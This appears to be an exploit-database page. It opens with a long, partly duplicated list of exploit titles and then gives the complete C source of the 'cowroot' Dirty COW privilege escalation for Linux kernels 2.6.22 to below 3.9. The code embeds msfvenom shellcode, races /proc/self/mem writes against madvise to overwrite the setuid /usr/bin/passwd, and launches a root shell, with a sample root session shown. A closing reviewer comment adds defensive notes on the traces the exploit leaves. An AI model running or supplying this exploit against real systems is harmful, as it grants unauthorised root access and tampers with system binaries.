
7 new exploits Xitami Web Server 5.0a0 - Denial of Service Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd) WinPower 4.9.0.4 - Privilege Escalation Internet PhotoShow (page) - Remote File Inclusion Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion EQdkp 1.3.0 - (dbal.php) Remote File Inclusion EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion MercuryBoard 1.1.4 - (User-Agent) SQL Injection MercuryBoard 1.1.4 - 'User-Agent' SQL Injection EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup Web Slider 0.6 - (path) Remote File Inclusion Web Slider 0.6 - 'path' Parameter Remote File Inclusion Zomplog 3.8 - (mp3playlist.php speler) SQL Injection Zomplog 3.8 - 'mp3playlist.php' SQL Injection EQdkp 1.3.2 - (listmembers.php rank) SQL Injection EQdkp 1.3.2 - 'listmembers.php' SQL Injection CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection ActiveKB KnowledgeBase 2.x - 'catId' SQL 
Injection ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Zomplog 3.8.1 - Arbitrary File Upload CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection Mega File Hosting Script 1.2 - (fid) SQL Injection Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload AJ HYIP ACME - 'topic_detail.php id' SQL Injection EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection AJ HYIP ACME - 'topic_detail.php' SQL Injection EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection CaLogic Calendars 1.2.2 - (langsel) SQL Injection CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection EMO Realty Manager - 'news.php ida' SQL Injection The Real Estate Script - 'dpage.php docID' SQL Injection Linkspile - 'link.php cat_id' SQL Injection Freelance Auction Script 1.0 - (browseproject.php) SQL Injection EMO Realty Manager - 'ida' Parameter SQL Injection The Real Estate Script - 'docID' Parameter SQL Injection Linkspile - 'cat_id' Parameter SQL Injection Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting Kostenloses Linkmanagementscript - Remote File Inclusion newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities 68 Classifieds 4.0 - (category.php cat) SQL Injection newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection 68 Classifieds 4.0 - 'category.php' SQL Injection StanWeb.CMS - (default.asp id) SQL 
Injection StanWeb.CMS - SQL Injection Archangel Weblog 0.90.02 - (post_id) SQL Injection Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection WR-Meeting 1.0 - (msnum) Local File Disclosure WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure FicHive 1.0 - (category) Blind SQL Injection Smeego 1.0 - (Cookie lang) Local File Inclusion FicHive 1.0 - 'category' Parameter Blind SQL Injection Smeego 1.0 - 'Cookie lang' Local File Inclusion TAGWORX.CMS - Multiple SQL Injections TAGWORX.CMS 3.00.02 - Multiple SQL Injections lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin easycms 0.4.2 - Multiple Vulnerabilities Lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin Easycms 0.4.2 - Multiple Vulnerabilities AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection EntertainmentScript - 'play.php id' SQL Injection EntertainmentScript 1.4.0 - 'play.php' SQL Injection ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities ComicShout 2.5 - (index.php comic_id) SQL Injection eCMS 0.4.2 - SQL Injection / Security Bypass Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery ComicShout 2.5 - 'comic_id' Parameter SQL Injection PHP Jokesite 2.0 - 'cat_id' SQL Injection Netious CMS 0.4 - (index.php pageid) SQL Injection PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection Netious CMS 0.4 - 'pageid' Parameter SQL Injection 6rbScript - 'news.php newsid' SQL Injection webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities 6rbScript - 'news.php' SQL Injection Weblosninger 4 - Cross-Site Scripting / SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / 
Cross-Site Scripting / dt) Multiple Vulnerabilities e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection Quate CMS 0.3.4 - Multiple Vulnerabilities RoomPHPlanning 1.5 - (idresa) SQL Injection PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion CMS MAXSITE 1.10 - (category) SQL Injection CMS MAXSITE 1.10 - 'category' Parameter SQL Injection CKGold Shopping Cart 2.5 - (category_id) SQL Injection CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection ComicShout 2.8 - (news.php news_id) SQL Injection ComicShout 2.8 - 'news_id' Parameter SQL Injection AJ HYIP ACME - 'news.php id' SQL Injection AJ HYIP ACME - 'news.php' SQL Injection Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection AJ HYIP ACME - 'comment.php artid' SQL Injection AJ HYIP ACME - 'readarticle.php artid' SQL Injection AJ HYIP ACME - 'comment.php' SQL Injection AJ HYIP ACME - 'readarticle.php' SQL Injection 6rbScript 3.3 - 'singerid' SQL Injection 6rbScript 3.3 - 'singerid' Parameter SQL Injection 6rbScript 3.3 - (section.php name) Local File Inclusion 6rbScript 3.3 - 'section.php' Local File Inclusion RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit RoomPHPlanning 1.6 - 'userform.php' Create Admin User Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion Quate CMS 0.3.5 - (Remote File Inclusioni 
/ Local File Inclusion) Multiple Vulnerabilities Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery YABSoft Advanced Image Hosting Script - SQL Injection Advanced Image Hosting Script - SQL Injection MercuryBoard 1.1 - index.php SQL Injection MercuryBoard 1.1 - 'index.php' SQL Injection CMS Made Simple 0.10 - Lang.php Remote File Inclusion CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion Zomplog 3.3/3.4 - detail.php HTML Injection Zomplog 3.3/3.4 - 'detail.php' HTML Injection CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting EQDKP 1.3.1 - Show Variable Cross-Site Scripting EQdkp 1.3.1 - Cross-Site Scripting CMS Made Simple 105 - Stylesheet.php SQL Injection CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection Internet PhotoShow - 'login_admin' Parameter Unauthorized Access 68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'login.php' Cross-Site Scripting 68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'category.php' Cross-Site Scripting 68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting 68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting CMS Made Simple Download 
Manager 1.4.1 Module - Arbitrary File Upload CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities Zomplog 3.9 - 'message' Parameter Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion Joomla! Component Catalog 1.0.7 - SQL Injection Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection Xfinity Gateway - Cross-Site Request Forgery
159 lines
4.8 KiB
C
Executable file
/*
|
|
*
|
|
* EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
|
|
*
|
|
* (un)comment correct payload first (x86 or x64)!
|
|
*
|
|
* $ gcc cowroot.c -o cowroot -pthread
|
|
* $ ./cowroot
|
|
* DirtyCow root privilege escalation
|
|
* Backing up /usr/bin/passwd.. to /tmp/bak
|
|
* Size of binary: 57048
|
|
* Racing, this may take a while..
|
|
* /usr/bin/passwd is overwritten
|
|
* Popping root shell.
|
|
* Don't forget to restore /tmp/bak
|
|
* thread stopped
|
|
* thread stopped
|
|
* root@box:/root/cow# id
|
|
* uid=0(root) gid=1000(foo) groups=1000(foo)
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/mman.h>
|
|
#include <fcntl.h>
|
|
#include <pthread.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
|
|
void *map;
|
|
int f;
|
|
int stop = 0;
|
|
struct stat st;
|
|
char *name;
|
|
pthread_t pth1,pth2,pth3;
|
|
|
|
// change if no permissions to read
|
|
char suid_binary[] = "/usr/bin/passwd";
|
|
|
|
/*
|
|
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
|
|
*/
|
|
unsigned char sc[] = {
|
|
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
|
|
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
|
|
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
|
|
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
|
|
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
|
|
};
|
|
unsigned int sc_len = 177;
|
|
|
|
/*
|
|
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
|
|
unsigned char sc[] = {
|
|
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
|
|
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
|
|
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
|
|
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
|
|
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
|
|
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
|
|
0x89, 0xe1, 0xcd, 0x80
|
|
};
|
|
unsigned int sc_len = 136;
|
|
*/
|
|
|
|
void *madviseThread(void *arg)
|
|
{
|
|
char *str;
|
|
str=(char*)arg;
|
|
int i,c=0;
|
|
for(i=0;i<1000000 && !stop;i++) {
|
|
c+=madvise(map,100,MADV_DONTNEED);
|
|
}
|
|
printf("thread stopped\n");
|
|
}
|
|
|
|
void *procselfmemThread(void *arg)
|
|
{
|
|
char *str;
|
|
str=(char*)arg;
|
|
int f=open("/proc/self/mem",O_RDWR);
|
|
int i,c=0;
|
|
for(i=0;i<1000000 && !stop;i++) {
|
|
lseek(f,map,SEEK_SET);
|
|
c+=write(f, str, sc_len);
|
|
}
|
|
printf("thread stopped\n");
|
|
}
|
|
|
|
void *waitForWrite(void *arg) {
|
|
char buf[sc_len];
|
|
|
|
for(;;) {
|
|
FILE *fp = fopen(suid_binary, "rb");
|
|
|
|
fread(buf, sc_len, 1, fp);
|
|
|
|
if(memcmp(buf, sc, sc_len) == 0) {
|
|
printf("%s is overwritten\n", suid_binary);
|
|
break;
|
|
}
|
|
|
|
fclose(fp);
|
|
sleep(1);
|
|
}
|
|
|
|
stop = 1;
|
|
|
|
printf("Popping root shell.\n");
|
|
printf("Don't forget to restore /tmp/bak\n");
|
|
|
|
system(suid_binary);
|
|
}
|
|
|
|
int main(int argc,char *argv[]) {
|
|
char *backup;
|
|
|
|
printf("DirtyCow root privilege escalation\n");
|
|
printf("Backing up %s.. to /tmp/bak\n", suid_binary);
|
|
|
|
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
|
|
system(backup);
|
|
|
|
f = open(suid_binary,O_RDONLY);
|
|
fstat(f,&st);
|
|
|
|
printf("Size of binary: %d\n", st.st_size);
|
|
|
|
char payload[st.st_size];
|
|
memset(payload, 0x90, st.st_size);
|
|
memcpy(payload, sc, sc_len+1);
|
|
|
|
map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
|
|
|
|
printf("Racing, this may take a while..\n");
|
|
|
|
pthread_create(&pth1, NULL, &madviseThread, suid_binary);
|
|
pthread_create(&pth2, NULL, &procselfmemThread, payload);
|
|
pthread_create(&pth3, NULL, &waitForWrite, NULL);
|
|
|
|
pthread_join(pth3, NULL);
|
|
|
|
return 0;
|
|
}
|
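Review bot: The header comment shows the build command and a sample run but never states which kernels the file applies to or what it leaves behind on the host; the range `Linux Kernel 2.6.22 < 3.9 (x86/x64)` appears only in the commit title. From the visible code, `main` shells out to copy `suid_binary` to `/tmp/bak`, and `waitForWrite` reports success once the first `sc_len` bytes of `/usr/bin/passwd` equal `sc`, so after a run the setuid binary no longer matches the packaged file until the backup is restored. I would add two header lines, `* Affects: Linux Kernel 2.6.22 < 3.9 (x86/x64), per the entry title.` and `* Leaves behind: /tmp/bak (original binary) and a modified /usr/bin/passwd; restore from /tmp/bak.`, so that anyone triaging a lab or incident host can check for both with a package-integrity or hash comparison of the setuid binary.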